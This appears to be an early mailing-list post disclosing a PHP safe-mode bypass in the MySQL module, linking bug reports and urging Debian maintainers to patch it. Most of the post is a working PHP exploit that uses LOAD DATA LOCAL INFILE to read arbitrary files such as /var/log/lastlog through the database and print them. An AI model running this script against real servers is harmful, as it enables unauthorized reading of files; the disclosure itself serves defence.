SECURITY HOLE in MySQL module in PHP
Hello!
You can read it in details at:
http://bugs.php.net/bug.php?id=15375
or at:
http://www.security.nnov.ru/search/document.asp?docid=2444
Short exploit:
<?
/*
PHP Safe Mode Problem
This script will connect to a database server running locally or otherwise,
create a temporary table with one column, use the LOAD DATA statement to
read a (possibly binary) file, then reads it back to the client.
Any type of file may pass through this 'proxy'. Although unrelated, this
may also be used to access files on the DB server (although they must be
world-readable or in MySQLd's basedir, according to docs).
*/
$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db = 'test_database';
$filename = '/var/log/lastlog'; /* File to grab from [local] server */
$local = true; /* Read from local filesystem */
$local = $local ? 'LOCAL' : '';
$sql = array (
"USE $db",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
Header ('Content-type: text/plain');
mysql_connect ($host, $user, $pass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo $r [0];
mysql_free_result ($q);
}
?>
Any comments or counsel?
Maybe debian developers should make a "quick and dirty" fix for this,
because (as I can understand) php developers already knows about this
hole and do still nothing.
Best regards,
Dmitry N. Hramtsov
Reply to: